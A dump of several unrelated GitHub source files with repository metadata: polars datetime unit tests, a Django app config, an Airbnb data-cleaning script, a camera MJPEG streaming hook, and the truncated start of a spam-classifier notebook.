on=\"dates\", strategy=\"forward\", tolerance=\"5ms\")[\n \"bid_right\"\n ].to_list() == [51.95, 51.95, None, None, 720.77, None, None, None]\n\n\ndef test_lambda_with_python_datetime_return_type() -> None:\n df = pl.DataFrame({\"timestamp\": [1284286794, 1234567890]})\n\n assert df.with_column(\n pl.col(\"timestamp\").apply(lambda x: datetime(2010, 9, 12)).alias(\"my_date_time\")\n )[\"my_date_time\"].to_list() == [\n datetime(2010, 9, 12),\n datetime(2010, 9, 12),\n ]\n\n\ndef test_timelike_init() -> None:\n durations = [timedelta(days=1), timedelta(days=2)]\n dates = [date(2022, 1, 1), date(2022, 1, 2)]\n datetimes = [datetime(2022, 1, 1), datetime(2022, 1, 2)]\n\n for ts in [durations, dates, datetimes]:\n s = pl.Series(ts)\n assert s.to_list() == ts\n\n\ndef test_duration_filter() -> None:\n date_df = pl.DataFrame(\n {\n \"start_date\": [date(2022, 1, 1), date(2022, 1, 1), date(2022, 1, 1)],\n \"end_date\": [date(2022, 1, 7), date(2022, 2, 20), date(2023, 1, 1)],\n }\n ).with_column((pl.col(\"end_date\") - pl.col(\"start_date\")).alias(\"time_passed\"))\n\n assert date_df.filter(pl.col(\"time_passed\") < timedelta(days=30)).shape[0] == 1\n assert date_df.filter(pl.col(\"time_passed\") >= timedelta(days=30)).shape[0] == 2\n\n\ndef test_agg_logical() -> None:\n dates = [date(2001, 1, 1), date(2002, 1, 1)]\n s = pl.Series(dates)\n assert s.max() == dates[1]\n assert s.min() == dates[0]\n\n\n@no_type_check\ndef test_from_time_arrow() -> None:\n times = pa.array([10, 20, 30], type=pa.time32(\"s\"))\n times_table = pa.table([times], names=[\"times\"])\n\n assert pl.from_arrow(times_table).to_series().to_list() == [\n time(0, 0, 10),\n time(0, 0, 20),\n time(0, 0, 30),\n ]\n\n\ndef test_datetime_strptime_patterns() -> None:\n # note that all should be year first\n df = pl.Series(\n \"date\",\n [\n \"09-05-2019\",\n \"2018-09-05\",\n \"2018-09-05T04:05:01\",\n \"2018-09-05T04:24:01.9\",\n \"2018-09-05T04:24:02.11\",\n \"2018-09-05T14:24:02.123\",\n \"2018-09-05T14:24:02.123Z\",\n \"2019-04-18T02:45:55.555000000\",\n \"2019-04-18T22:45:55.555123\",\n ],\n ).to_frame()\n s = df.with_columns(\n [\n pl.col(\"date\")\n .str.strptime(pl.Datetime, fmt=None, strict=False)\n .alias(\"parsed\"),\n ]\n )[\"parsed\"]\n assert s.null_count() == 1\n assert s[0] is None\n\n\ndef test_timedelta_from() -> None:\n as_dict = {\n \"A\": [1, 2],\n \"B\": [timedelta(seconds=4633), timedelta(seconds=50)],\n }\n as_rows = [\n {\n \"A\": 1,\n \"B\": timedelta(seconds=4633),\n },\n {\n \"A\": 2,\n \"B\": timedelta(seconds=50),\n },\n ]\n assert pl.DataFrame(as_dict).frame_equal(pl.DataFrame(as_rows))\n\n\ndef test_duration_aggregations() -> None:\n df = pl.DataFrame(\n {\n \"group\": [\"A\", \"B\", \"A\", \"B\"],\n \"start\": [\n datetime(2022, 1, 1),\n datetime(2022, 1, 2),\n datetime(2022, 1, 3),\n datetime(2022, 1, 4),\n ],\n \"end\": [\n datetime(2022, 1, 2),\n datetime(2022, 1, 4),\n datetime(2022, 1, 6),\n datetime(2022, 1, 6),\n ],\n }\n )\n df = df.with_column((pl.col(\"end\") - pl.col(\"start\")).alias(\"duration\"))\n assert df.groupby(\"group\", maintain_order=True).agg(\n [\n pl.col(\"duration\").mean().alias(\"mean\"),\n pl.col(\"duration\").sum().alias(\"sum\"),\n pl.col(\"duration\").min().alias(\"min\"),\n pl.col(\"duration\").max().alias(\"max\"),\n pl.col(\"duration\").quantile(0.1).alias(\"quantile\"),\n pl.col(\"duration\").median().alias(\"median\"),\n pl.col(\"duration\").list().alias(\"list\"),\n ]\n ).to_dict(False) == {\n \"group\": [\"A\", \"B\"],\n \"mean\": [timedelta(days=2), timedelta(days=2)],\n \"sum\": [timedelta(days=4), timedelta(days=4)],\n \"min\": [timedelta(days=1), timedelta(days=2)],\n \"max\": [timedelta(days=3), timedelta(days=2)],\n \"quantile\": [timedelta(days=1), timedelta(days=2)],\n \"median\": [timedelta(days=2), timedelta(days=2)],\n \"list\": [\n [timedelta(days=1), timedelta(days=3)],\n [timedelta(days=2), timedelta(days=2)],\n ],\n }\n\n\ndef test_datetime_units() -> None:\n df = pl.DataFrame(\n {\n \"ns\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 5, 1), \"1mo\", time_unit=\"ns\"\n ),\n \"us\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 5, 1), \"1mo\", time_unit=\"us\"\n ),\n \"ms\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 5, 1), \"1mo\", time_unit=\"ms\"\n ),\n }\n )\n names = set(df.columns)\n\n for unit in DTYPE_TEMPORAL_UNITS:\n subset = names - {unit}\n\n assert (\n len(set(df.select([pl.all().exclude(pl.Datetime(unit))]).columns) - subset)\n == 0\n )\n\n\ndef test_datetime_instance_selection() -> None:\n test_data = {\n \"ns\": [datetime(2022, 12, 31, 1, 2, 3)],\n \"us\": [datetime(2022, 12, 31, 4, 5, 6)],\n \"ms\": [datetime(2022, 12, 31, 7, 8, 9)],\n }\n df = pl.DataFrame(\n data=test_data,\n columns=[\n (\"ns\", pl.Datetime(\"ns\")),\n (\"us\", pl.Datetime(\"us\")),\n (\"ms\", pl.Datetime(\"ms\")),\n ],\n )\n for tu in DTYPE_TEMPORAL_UNITS:\n res = df.select(pl.col([pl.Datetime(tu)])).dtypes\n assert res == [pl.Datetime(tu)]\n assert len(df.filter(pl.col(tu) == test_data[tu][0])) == 1\n\n\ndef test_unique_counts_on_dates() -> None:\n assert pl.DataFrame(\n {\n \"dt_ns\": pl.date_range(datetime(2020, 1, 1), datetime(2020, 3, 1), \"1mo\"),\n }\n ).with_columns(\n [\n pl.col(\"dt_ns\").dt.cast_time_unit(\"us\").alias(\"dt_us\"),\n pl.col(\"dt_ns\").dt.cast_time_unit(\"ms\").alias(\"dt_ms\"),\n pl.col(\"dt_ns\").cast(pl.Date).alias(\"date\"),\n ]\n ).select(\n pl.all().unique_counts().sum()\n ).to_dict(\n False\n ) == {\n \"dt_ns\": [3],\n \"dt_us\": [3],\n \"dt_ms\": [3],\n \"date\": [3],\n }\n\n\ndef test_groupby_rolling_by_ordering() -> None:\n # we must check that the keys still match the time labels after the rolling window\n # with a `by` argument.\n df = pl.DataFrame(\n {\n \"dt\": [\n datetime(2022, 1, 1, 0, 1),\n datetime(2022, 1, 1, 0, 2),\n datetime(2022, 1, 1, 0, 3),\n datetime(2022, 1, 1, 0, 4),\n datetime(2022, 1, 1, 0, 5),\n datetime(2022, 1, 1, 0, 6),\n datetime(2022, 1, 1, 0, 7),\n ],\n \"key\": [\"A\", \"A\", \"B\", \"B\", \"A\", \"B\", \"A\"],\n \"val\": [1, 1, 1, 1, 1, 1, 1],\n }\n )\n\n assert df.groupby_rolling(\n index_column=\"dt\",\n period=\"2m\",\n closed=\"both\",\n offset=\"-1m\",\n by=\"key\",\n ).agg(\n [\n pl.col(\"val\").sum().alias(\"sum val\"),\n ]\n ).to_dict(\n False\n ) == {\n \"key\": [\"A\", \"A\", \"A\", \"A\", \"B\", \"B\", \"B\"],\n \"dt\": [\n datetime(2022, 1, 1, 0, 1),\n datetime(2022, 1, 1, 0, 2),\n datetime(2022, 1, 1, 0, 5),\n datetime(2022, 1, 1, 0, 7),\n datetime(2022, 1, 1, 0, 3),\n datetime(2022, 1, 1, 0, 4),\n datetime(2022, 1, 1, 0, 6),\n ],\n \"sum val\": [2, 2, 1, 1, 2, 2, 1],\n }\n\n\ndef test_add_duration_3786() -> None:\n df = pl.DataFrame(\n {\n \"datetime\": [datetime(2022, 1, 1), datetime(2022, 1, 2)],\n \"add\": [1, 2],\n }\n )\n assert df.slice(0, 1).with_columns(\n [\n (pl.col(\"datetime\") + pl.duration(weeks=\"add\")).alias(\"add_weeks\"),\n (pl.col(\"datetime\") + pl.duration(days=\"add\")).alias(\"add_days\"),\n (pl.col(\"datetime\") + pl.duration(seconds=\"add\")).alias(\"add_seconds\"),\n (pl.col(\"datetime\") + pl.duration(milliseconds=\"add\")).alias(\n \"add_milliseconds\"\n ),\n (pl.col(\"datetime\") + pl.duration(hours=\"add\")).alias(\"add_hours\"),\n ]\n ).to_dict(False) == {\n \"datetime\": [datetime(2022, 1, 1, 0, 0)],\n \"add\": [1],\n \"add_weeks\": [datetime(2022, 1, 8, 0, 0)],\n \"add_days\": [datetime(2022, 1, 2, 0, 0)],\n \"add_seconds\": [datetime(2022, 1, 1, 0, 0, 1)],\n \"add_milliseconds\": [datetime(2022, 1, 1, 0, 0, 0, 1000)],\n \"add_hours\": [datetime(2022, 1, 1, 1, 0)],\n }\n\n\ndef test_groupby_rolling_by_() -> None:\n df = pl.DataFrame({\"group\": pl.arange(0, 3, eager=True)}).join(\n pl.DataFrame(\n {\n \"datetime\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 1, 5), \"1d\"\n ),\n }\n ),\n how=\"cross\",\n )\n out = (\n df.sort(\"datetime\")\n .groupby_rolling(index_column=\"datetime\", by=\"group\", period=\"3d\")\n .agg([pl.count().alias(\"count\")])\n )\n\n expected = (\n df.sort([\"group\", \"datetime\"])\n .groupby_rolling(index_column=\"datetime\", by=\"group\", period=\"3d\")\n .agg([pl.count().alias(\"count\")])\n )\n assert out.sort([\"group\", \"datetime\"]).frame_equal(expected)\n assert out.to_dict(False) == {\n \"group\": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2],\n \"datetime\": [\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 2, 0, 0),\n datetime(2020, 1, 3, 0, 0),\n datetime(2020, 1, 4, 0, 0),\n datetime(2020, 1, 5, 0, 0),\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 2, 0, 0),\n datetime(2020, 1, 3, 0, 0),\n datetime(2020, 1, 4, 0, 0),\n datetime(2020, 1, 5, 0, 0),\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 2, 0, 0),\n datetime(2020, 1, 3, 0, 0),\n datetime(2020, 1, 4, 0, 0),\n datetime(2020, 1, 5, 0, 0),\n ],\n \"count\": [1, 2, 3, 3, 3, 1, 2, 3, 3, 3, 1, 2, 3, 3, 3],\n }\n\n\ndef test_quarter() -> None:\n assert pl.date_range(\n datetime(2022, 1, 1), datetime(2022, 12, 1), \"1mo\"\n ).dt.quarter().to_list() == [1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4]\n\n\ndef test_date_offset() -> None:\n out = pl.DataFrame(\n {\"dates\": pl.date_range(datetime(2000, 1, 1), datetime(2020, 1, 1), \"1y\")}\n ).with_columns(\n [\n pl.col(\"dates\").dt.offset_by(\"1y\").alias(\"date_plus_1y\"),\n pl.col(\"dates\").dt.offset_by(\"-1y2mo\").alias(\"date_min\"),\n ]\n )\n\n assert (out[\"date_plus_1y\"].dt.day() == 1).all()\n assert (out[\"date_min\"].dt.day() == 1).all()\n assert out[\"date_min\"].to_list() == [\n datetime(1998, 11, 1, 0, 0),\n datetime(1999, 11, 1, 0, 0),\n datetime(2000, 11, 1, 0, 0),\n datetime(2001, 11, 1, 0, 0),\n datetime(2002, 11, 1, 0, 0),\n datetime(2003, 11, 1, 0, 0),\n datetime(2004, 11, 1, 0, 0),\n datetime(2005, 11, 1, 0, 0),\n datetime(2006, 11, 1, 0, 0),\n datetime(2007, 11, 1, 0, 0),\n datetime(2008, 11, 1, 0, 0),\n datetime(2009, 11, 1, 0, 0),\n datetime(2010, 11, 1, 0, 0),\n datetime(2011, 11, 1, 0, 0),\n datetime(2012, 11, 1, 0, 0),\n datetime(2013, 11, 1, 0, 0),\n datetime(2014, 11, 1, 0, 0),\n datetime(2015, 11, 1, 0, 0),\n datetime(2016, 11, 1, 0, 0),\n datetime(2017, 11, 1, 0, 0),\n datetime(2018, 11, 1, 0, 0),\n ]\n\n\ndef test_sorted_unique() -> None:\n assert (\n pl.DataFrame(\n [pl.Series(\"dt\", [date(2015, 6, 24), date(2015, 6, 23)], dtype=pl.Date)]\n )\n .sort(\"dt\")\n .unique()\n ).to_dict(False) == {\"dt\": [date(2015, 6, 23), date(2015, 6, 24)]}\n\n\ndef test_time_zero_3828() -> None:\n assert pl.Series(values=[time(0)], dtype=pl.Time).to_list() == [time(0)]\n\n\ndef test_time_microseconds_3843() -> None:\n in_val = [time(0, 9, 11, 558332)]\n s = pl.Series(in_val)\n assert s.to_list() == in_val\n\n\ndef test_year_empty_df() -> None:\n df = pl.DataFrame(pl.Series(name=\"date\", dtype=pl.Date))\n assert df.select(pl.col(\"date\").dt.year()).dtypes == [pl.Int32]\n\n\ndef test_sum_duration() -> None:\n assert pl.DataFrame(\n [\n {\"name\": \"Jen\", \"duration\": timedelta(seconds=60)},\n {\"name\": \"Mike\", \"duration\": timedelta(seconds=30)},\n {\"name\": \"Jen\", \"duration\": timedelta(seconds=60)},\n ]\n ).select(\n [pl.col(\"duration\").sum(), pl.col(\"duration\").dt.seconds().alias(\"sec\").sum()]\n ).to_dict(\n False\n ) == {\n \"duration\": [timedelta(seconds=150)],\n \"sec\": [150],\n }\n\n\ndef test_supertype_timezones_4174() -> None:\n df = pl.DataFrame(\n {\n \"dt\": pl.date_range(datetime(2020, 3, 1), datetime(2020, 5, 1), \"1mo\"),\n }\n ).with_columns(\n [\n pl.col(\"dt\").dt.with_time_zone(\"Europe/London\").suffix(\"_London\"),\n ]\n )\n\n # test if this runs without error\n date_to_fill = df[\"dt_London\"][0]\n df.with_column(df[\"dt_London\"].shift_and_fill(1, date_to_fill))\n\n\ndef test_weekday() -> None:\n # monday\n s = pl.Series([datetime(2020, 1, 6)])\n\n time_units: list[TimeUnit] = [\"ns\", \"us\", \"ms\"]\n for tu in time_units:\n assert s.dt.cast_time_unit(tu).dt.weekday()[0] == 0\n\n assert s.cast(pl.Date).dt.weekday()[0] == 0\n\n\ndef test_from_dict_tu_consistency() -> None:\n tz = zoneinfo.ZoneInfo(\"PRC\")\n dt = datetime(2020, 8, 1, 12, 0, 0, tzinfo=tz)\n from_dict = pl.from_dict({\"dt\": [dt]})\n from_dicts = pl.from_dicts([{\"dt\": dt}])\n\n assert from_dict.dtypes == from_dicts.dtypes\n\n\ndef test_date_parse_omit_day() -> None:\n df = pl.DataFrame({\"month\": [\"2022-01\"]})\n assert df.select(pl.col(\"month\").str.strptime(pl.Date, fmt=\"%Y-%m\"))[0, 0] == date(\n 2022, 1, 1\n )\n assert df.select(pl.col(\"month\").str.strptime(pl.Datetime, fmt=\"%Y-%m\"))[\n 0, 0\n ] == datetime(2022, 1, 1)\n\n\ndef test_shift_and_fill_group_logicals() -> None:\n df = pl.from_records(\n [\n (date(2001, 1, 2), \"A\"),\n (date(2001, 1, 3), \"A\"),\n (date(2001, 1, 4), \"A\"),\n (date(2001, 1, 3), \"B\"),\n (date(2001, 1, 4), \"B\"),\n ],\n columns=[\"d\", \"s\"],\n )\n assert df.select(\n pl.col(\"d\").shift_and_fill(-1, pl.col(\"d\").max()).over(\"s\")\n ).dtypes == [pl.Date]\n\n\ndef test_date_arr_concat() -> None:\n expected = {\"d\": [[date(2000, 1, 1), date(2000, 1, 1)]]}\n\n # type date\n df = pl.DataFrame({\"d\": [date(2000, 1, 1)]})\n assert df.select(pl.col(\"d\").arr.concat(pl.col(\"d\"))).to_dict(False) == expected\n # type list[date]\n df = pl.DataFrame({\"d\": [[date(2000, 1, 1)]]})\n assert df.select(pl.col(\"d\").arr.concat(pl.col(\"d\"))).to_dict(False) == expected\n\n\ndef test_date_timedelta() -> None:\n df = pl.DataFrame({\"date\": pl.date_range(date(2001, 1, 1), date(2001, 1, 3), \"1d\")})\n assert df.with_columns(\n [\n (pl.col(\"date\") + timedelta(days=1)).alias(\"date_plus_one\"),\n (pl.col(\"date\") - timedelta(days=1)).alias(\"date_min_one\"),\n ]\n ).to_dict(False) == {\n \"date\": [date(2001, 1, 1), date(2001, 1, 2), date(2001, 1, 3)],\n \"date_plus_one\": [date(2001, 1, 2), date(2001, 1, 3), date(2001, 1, 4)],\n \"date_min_one\": [date(2000, 12, 31), date(2001, 1, 1), date(2001, 1, 2)],\n }\n\n\ndef test_datetime_string_casts() -> None:\n df = pl.DataFrame(\n {\n \"x\": [1661855445123],\n \"y\": [1661855445123456],\n \"z\": [1661855445123456789],\n },\n columns=[\n (\"x\", pl.Datetime(\"ms\")),\n (\"y\", pl.Datetime(\"us\")),\n (\"z\", pl.Datetime(\"ns\")),\n ],\n )\n assert df.select(\n [pl.col(\"x\").dt.strftime(\"%F %T\").alias(\"w\")]\n + [pl.col(d).cast(str) for d in df.columns]\n ).rows() == [\n (\n \"2022-08-30 10:30:45\",\n \"2022-08-30 10:30:45.123\",\n \"2022-08-30 10:30:45.123456\",\n \"2022-08-30 10:30:45.123456789\",\n )\n ]\n\n\ndef test_short_formats() -> None:\n s = pl.Series([\"20202020\", \"2020\"])\n assert s.str.strptime(pl.Date, \"%Y\", strict=False).to_list() == [\n None,\n date(2020, 1, 1),\n ]\n assert s.str.strptime(pl.Date, \"%foo\", strict=False).to_list() == [None, None]\n\n\ndef test_iso_year() -> None:\n dt = datetime(2022, 1, 1, 7, 8, 40)\n assert pl.Series([dt]).dt.iso_year()[0] == 2021\n\n\ndef test_invalid_date_parsing_4898() -> None:\n assert pl.Series([\"2022-09-18\", \"2022-09-50\"]).str.strptime(\n pl.Date, \"%Y-%m-%d\", strict=False\n ).to_list() == [date(2022, 9, 18), None]\n\n\ndef test_cast_timezone() -> None:\n assert pl.DataFrame({\"a\": [datetime(2022, 9, 25, 14)]}).with_column(\n pl.col(\"a\")\n .dt.with_time_zone(\"America/New_York\")\n .dt.cast_time_zone(\"UTC\")\n .alias(\"b\")\n ).to_dict(False) == {\n \"a\": [datetime(2022, 9, 25, 14, 0)],\n \"b\": [datetime(2022, 9, 25, 18, 0)],\n }\n assert pl.DataFrame({\"a\": [datetime(2022, 9, 25, 18)]}).with_column(\n pl.col(\"a\")\n .dt.with_time_zone(\"UTC\")\n .dt.cast_time_zone(\"America/New_York\")\n .alias(\"b\")\n ).to_dict(False) == {\n \"a\": [datetime(2022, 9, 25, 18, 0)],\n \"b\": [datetime(2022, 9, 25, 14, 0)],\n }\n","repo_name":"koga25/polars-private","sub_path":"py-polars/tests/unit/test_datelike.py","file_name":"test_datelike.py","file_ext":"py","file_size_in_byte":47608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16683885915","text":"import logging\nfrom pathlib import Path\n\nfrom django.apps import AppConfig\nfrom django.utils.autoreload import file_changed\n\nautoreload_logger = logging.getLogger(\"django.utils.autoreload\")\n\n\ndef skip_dist(sender, file_path: Path, **kwargs): # pragma: no cover\n \"\"\"\n Don't restart the dev server for changes in the /dist folder. Otherwise the server\n goes down while webpack hot-reloads the frontend.\n \"\"\"\n if \"dist/\" in str(file_path):\n autoreload_logger.info(f\"Skipping autoreload for {file_path}\")\n return True\n\n\nclass ApiConfig(AppConfig):\n name = \"metecho.api\"\n verbose_name = \"API\"\n\n def ready(self):\n super().ready()\n file_changed.connect(skip_dist, dispatch_uid=\"Skip dist autoreload\")\n","repo_name":"SFDO-Tooling/Metecho","sub_path":"metecho/api/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"16"} +{"seq_id":"18478987376","text":"import ast\nimport pandas as pd\nimport re\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\n\n\ndef remove_rows_with_missing_ratings(listings):\n \n '''\n The function removes rows with missing ratings from a given dataframe.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a DataFrame object that contains data about listings. It likely has\n multiple columns, including one named \"Value_rating\" and possibly a column named \"Unnamed: 19\". The\n function is designed to remove rows from the DataFrame where the \"Value_rating\" column has missing\n values\n \n Returns\n -------\n the updated \"listings\" dataframe after removing rows with missing ratings.\n '''\n \n listings = listings.drop('Unnamed: 19', axis=1)\n listings = listings.dropna(subset=['Value_rating'])\n \n \n return listings\n\n\ndef combine_description_strings(listings):\n \n '''\n The function `combine_description_strings` takes a DataFrame of listings, drops rows with missing\n descriptions, removes a specific listing, converts strings of lists to actual lists, removes\n specific parts from the description, and joins the remaining description strings.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a DataFrame containing information about different listings. It is\n assumed that the DataFrame has a column named \"Description\" which contains strings describing each\n listing.\n \n Returns\n -------\n the modified \"listings\" dataframe.\n '''\n \n listings = listings.dropna(subset=['Description'])\n \n # deleting 1 listing - poor data entry\n listings = listings[listings['ID'] != '4c917b3c-d693-4ee4-a321-f5babc728dc9']\n \n # strings of a list of strings changed to list of strings\n listings['Description'] = listings['Description'].apply(ast.literal_eval)\n \n delete_these_parts = ['About this space', 'The space', 'Other things to note', 'Guest access', '']\n for part in delete_these_parts:\n listings['Description'] = listings['Description'].apply(lambda x: [item for item in x if item != part])\n \n listings['Description'] = listings['Description'].apply(lambda x: ' '.join(x) if isinstance(x, list) else x)\n \n \n return listings\n\n\ndef combine_amenities_strings(listings):\n \n '''\n The function `combine_amenities_strings` takes a DataFrame `listings` and performs several\n operations to clean and combine the strings in the 'Amenities' column.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a DataFrame that contains information about different listings. It\n likely has columns such as \"Amenities\" which contains a list of amenities for each listing. The\n function \"combine_amenities_strings\" takes this DataFrame as input and performs some operations on\n the \"Amen\n \n Returns\n -------\n the modified 'listings' dataframe with the 'Amenities' column updated.\n '''\n \n # strings of a list of strings changed to list of strings\n listings['Amenities'] = listings['Amenities'].apply(ast.literal_eval)\n \n #all 'Unavailable: TV/nTV' elements to 'Unavailable: TV', delete newline and second repeat\n listings['Amenities'] = listings['Amenities'].apply(lambda amenities: [item.split('\\n')[0] if item.startswith('Unavailable') else item for item in amenities])\n\n delete_these_parts = ['What this place offers', '']\n for part in delete_these_parts:\n listings['Amenities'] = listings['Amenities'].apply(lambda x: [item for item in x if item != part])\n \n listings['Amenities'] = listings['Amenities'].apply(lambda x: '. '.join(x) if isinstance(x, list) else x)\n \n return listings\n\n\ndef set_default_feature_values(listings):\n \n '''\n The function sets default values for specific features in a listings dataset.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a dictionary or a data structure that contains information about\n different listings. Each listing has features such as \"guests\", \"beds\", \"bathrooms\", and \"bedrooms\".\n \n Returns\n -------\n the updated \"listings\" dictionary with default values filled in for any missing values in the\n \"guests\", \"beds\", \"bathrooms\", and \"bedrooms\" features.\n '''\n \n default_value = 1\n features = [\"guests\", \"beds\", \"bathrooms\", \"bedrooms\"]\n \n for feature in features:\n listings[feature] = listings[feature].fillna(default_value)\n \n return listings\n\n\ndef replace_newlines(text):\n \n '''\n The function `replace_newlines` replaces consecutive newlines in a text with either a dot and a\n space or a single space, depending on whether there is a non-alphanumeric character in front of the\n newlines.\n \n Parameters\n ----------\n text\n The `text` parameter is a string that represents the text that you want to modify.\n \n Returns\n -------\n the modified text with consecutive newlines replaced either with a dot and a space or with a single\n space, depending on whether there is a non-alphanumeric character in front of the newlines.\n '''\n \n # Replace consecutive newlines with a dot and a space if no non-alphanumeric character in front\n text = re.sub(r'(?<!\\W)\\n+', '. ', text)\n \n # Replace consecutive newlines with a single space if a non-alphanumeric character is in front\n text = re.sub(r'(?<=\\W)\\n+', ' ', text)\n \n return text\n\n\ndef clean_tabular_data(listings):\n \n '''\n The function `clean_tabular_data` takes a dataframe of listings, performs various cleaning and\n preprocessing steps, and returns a standardized version of the data.\n \n Parameters\n ----------\n listings\n The `listings` parameter is a DataFrame containing tabular data.\n \n Returns\n -------\n the standardized and encoded tabular data.\n '''\n \n listings = remove_rows_with_missing_ratings(listings)\n listings = combine_description_strings(listings)\n listings = set_default_feature_values(listings)\n listings['Description'] = listings['Description'].apply(replace_newlines)\n listings = combine_amenities_strings(listings)\n \n return standardized_data\n\n\ndef load_airbnb(label, num_only=True):\n \n '''\n The function `load_airbnb` loads tabular data from a CSV file and returns the features and labels as\n NumPy arrays, with an option to include only numerical columns.\n \n Parameters\n ----------\n label\n The label parameter is the column name of the target variable in the dataset. It is the variable\n that you want to predict or classify.\n num_only, optional\n The `num_only` parameter is a boolean flag that determines whether only numerical columns should be\n included in the features or all columns (including categorical columns). If `num_only` is set to\n `True`, only numerical columns will be included in the features. If `num_only` is set to `\n \n Returns\n -------\n The function `load_airbnb` returns two values: `features` and `labels`.\n '''\n\n clean_data = pd.read_csv('tabular_data/clean_tabular_data.csv')\n clean_data.reset_index(drop=True, inplace=True) # Reset the index\n\n labels = clean_data[label].values # Convert to NumPy array\n\n if num_only:\n num_columns = clean_data.select_dtypes(exclude=['object']).columns\n\n if label in num_columns:\n features = clean_data[num_columns].drop(columns=[label]).values # Convert to NumPy array\n else:\n features = clean_data[num_columns].values # Convert to NumPy array\n\n else:\n features = clean_data.drop(columns=[label]).values # Convert to NumPy array\n\n return features, labels\n\n\n\nif __name__ == \"__main__\":\n \n listings = pd.read_csv('tabular_data/listing.csv')\n standardized_data = clean_tabular_data(listings)\n \n # Encode ordinal features\n standardized_data['bathrooms'] = standardized_data['bathrooms'].astype(int)\n standardized_data['guests'] = standardized_data['guests'].astype(int)\n standardized_data['beds'] = standardized_data['beds'].astype(int)\n standardized_data['bedrooms'] = standardized_data['bedrooms'].astype(int)\n \n # standardize the numeric features\n numeric_columns = listings[['bathrooms', 'guests', 'beds', 'bedrooms', 'Cleanliness_rating', 'Accuracy_rating', 'Communication_rating', 'Location_rating', 'Check-in_rating', 'Value_rating', 'amenities_count']]\n scaler = StandardScaler()\n scaler.fit(numeric_columns)\n standardized_columns = scaler.transform(numeric_columns)\n standardized_data = listings.copy()\n standardized_data[numeric_columns.columns] = standardized_columns\n\n # Encode 'Category' labels\n label_encoder = LabelEncoder()\n encoded_labels = label_encoder.fit_transform(standardized_data['Category'])\n standardized_data['Category'] = encoded_labels\n \n standardized_data.to_csv(\"tabular_data/clean_tabular_data.csv\", index=False)\n","repo_name":"raweru/modelling-airbnbs-property-listing-dataset-","sub_path":"tabular_data.py","file_name":"tabular_data.py","file_ext":"py","file_size_in_byte":9056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24410918983","text":"from pathlib import Path\n\nfrom jinja2 import Template\nfrom starlette.routing import Route, Router\n\nfrom opsi.manager.manager_schema import Hook\nfrom opsi.manager.netdict import NT_AVAIL, NetworkDict\nfrom opsi.util.templating import LiteralTemplate\n\nfrom .mjpeg import MjpegResponse\n\n\nclass CamHook(Hook):\n # Matches both \"camera.mjpg\" and \"camera.mjpeg\"\n ROUTE_URL = \"/{func}.mjpe?g\" # Route to bind to\n STREAM_URL = \"/{func}.mjpeg\" # Canonical path\n\n path = Path(__file__).parent\n with open(path / \"mjpeg.html\") as f:\n TEMPLATE = f.read()\n TEMPLATE = Template(TEMPLATE)\n\n CAMERA_NAME = \"OpenSight: {func}\"\n CAMERA_URL_NT = f\"mjpeg:{{url}}{STREAM_URL}?\"\n CAMERA_URL_WEB = f\"{{url}}{STREAM_URL}\"\n\n def __init__(self):\n super().__init__()\n\n self.app = Router()\n if NT_AVAIL:\n self.netdict = NetworkDict(\"/CameraPublisher\")\n self.funcs = {} # {name: route}\n self.cams = {} # {name: url}\n self.index_route = [Route(\"/\", LiteralTemplate(self.TEMPLATE, cams=self.cams))]\n self.listeners = {\"startup\": set(), \"shutdown\": set(), \"pipeline_update\": set()}\n\n self._update()\n\n def _update(self):\n self.app.routes = self.index_route + list(self.funcs.values())\n\n def endpoint(self, camserv):\n def response(request):\n return MjpegResponse(request, camserv)\n\n return response\n\n def register(self, func):\n if func.id in self.funcs:\n raise ValueError(\"Cannot have duplicate name\")\n\n self.funcs[func.id] = Route(\n self.ROUTE_URL.format(func=func.id), self.endpoint(func)\n )\n self.cams[func.id] = self.CAMERA_URL_WEB.format(url=self.url, func=func.id)\n self._update()\n\n # https://github.com/wpilibsuite/allwpilib/blob/ec9738245d86ec5a535a7d9eb22eadc78dee88b4/wpilibj/src/main/java/edu/wpi/first/wpilibj/CameraServer.java#L313\n if NT_AVAIL:\n ntdict = self.netdict.get_subtable(self.CAMERA_NAME.format(func=func.id))\n ntdict[\"streams\"] = [self.CAMERA_URL_NT.format(url=self.url, func=func.id)]\n\n def unregister(self, func):\n try:\n del self.funcs[func.id]\n del self.cams[func.id]\n except KeyError:\n pass\n\n if NT_AVAIL:\n self.netdict.delete_table(self.CAMERA_NAME.format(func=func.id))\n\n self._update()\n","repo_name":"opensight-cv/opensight","sub_path":"opsi/modules/videoio/camhook.py","file_name":"camhook.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"16"} +{"seq_id":"37698281578","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nspam_df = pd.read_csv('./data/spam.csv', header=0, encoding=\"ISO-8859-1\")\n\n# 数据展示\n_, ax = plt.subplots(1,2,figsize=(10,5))\nspam_df['label'].value_counts().plot(ax=ax[0], kind=\"bar\", rot=90, title='label');\nspam_df['label'].value_counts().plot(ax=ax[1], kind=\"pie\", rot=90, title='label', ylabel='');\nprint(\"Dataset size: \", spam_df.shape)\n\nspam_df.head(5)\n\n\n# In[1]:\n\n\n# 导入相关的库\nimport nltk\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.data import load\nfrom nltk.stem import 